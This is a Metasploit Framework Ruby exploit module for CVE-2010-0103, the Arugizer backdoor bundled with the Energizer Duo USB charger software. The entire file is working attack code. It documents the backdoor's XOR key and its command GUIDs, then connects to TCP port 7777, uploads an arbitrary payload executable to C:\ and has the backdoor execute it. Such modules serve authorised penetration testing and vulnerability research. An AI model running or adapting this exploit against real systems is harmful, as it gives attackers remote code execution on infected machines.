##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
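class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Every byte sent to or received from the backdoor is XORed with this key
  # (see #trojan_encode).
  TROJAN_XOR_KEY = 0xE5

  # Command identifiers understood by the backdoor, keyed by the symbol
  # this module uses for them. Only :write, :exec and :nop are exercised
  # by #exploit; the remaining entries document the rest of the protocol.
  TROJAN_COMMANDS = {
    :exec    => "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}",
    :dir     => "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}",
    :write   => "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}",
    :read    => "{F6C43E1A-1551-4000-A483-C361969AEC41}",
    :nop     => "{783EACBF-EF8B-498e-A059-F0B5BD12641E}",
    :find    => "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}",
    :yes     => "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}",
    :runonce => "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}",
    :delete  => "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
  }.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Energizer DUO Trojan Code Execution',
      'Description'    => %q{
          This module will execute an arbitrary payload against
        any system infected with the Arugizer trojan horse. This
        backdoor was shipped with the software package accompanying
        the Energizer Duo USB battery charger.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          ['CVE', '2010-0103'],
          ['URL', 'http://www.kb.cert.org/vuls/id/154421']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0
    ))

    # The backdoor listens on TCP/7777 by default; RPORT is exposed so
    # non-default deployments can be reached.
    register_options(
      [
        Opt::RPORT(7777),
      ], self.class)
  end

  #
  # XOR-obfuscate a string for the wire, byte by byte, with TROJAN_XOR_KEY.
  # The transform is its own inverse, so the same method decodes replies.
  #
  # @param str [String] raw bytes to encode
  # @return [String] encoded bytes, same length as the input
  #
  def trojan_encode(str)
    str.unpack("C*").map { |c| c ^ TROJAN_XOR_KEY }.pack("C*")
  end

  #
  # Build an encoded command frame: a little-endian length (including the
  # terminating NUL), the command GUID string and a NUL byte.
  #
  # @param cmd [Symbol] one of the keys of TROJAN_COMMANDS
  # @return [String] encoded frame ready for sock.put
  # @raise [ArgumentError] if cmd is not a known command (the original code
  #   silently sent an empty identifier in that case)
  #
  def trojan_command(cmd)
    cid = TROJAN_COMMANDS[cmd]
    raise ArgumentError, "unknown trojan command: #{cmd.inspect}" unless cid

    trojan_encode([cid.length + 1].pack("V") + cid + "\x00")
  end

  #
  # Send a length-prefixed string argument: a little-endian 32-bit length
  # followed by the bytes themselves, both XOR-encoded.
  #
  # @param str [String] argument bytes (callers include any trailing NUL)
  # @return [void]
  #
  def trojan_put_string(str)
    sock.put(trojan_encode([str.length].pack("V")))
    sock.put(trojan_encode(str))
  end

  #
  # Upload the payload executable to a random path under C:\ with the
  # :write command, then ask the backdoor to run it with :exec. Each
  # request is sent over its own connection.
  #
  def exploit
    nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
    exe = Msf::Util::EXE.to_win32pe(framework, payload.encoded) + "\x00"

    print_status("Trying to upload #{nam}...")
    connect

    # Write file request: destination path, then file contents
    sock.put(trojan_command(:write))
    trojan_put_string(nam)
    trojan_put_string(exe)

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))

    disconnect

    #
    # Execute the payload
    #
    print_status("Trying to execute #{nam}...")
    connect

    # Execute file request: path of the file written above
    sock.put(trojan_command(:exec))
    trojan_put_string(nam)

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))

    disconnect
  end

end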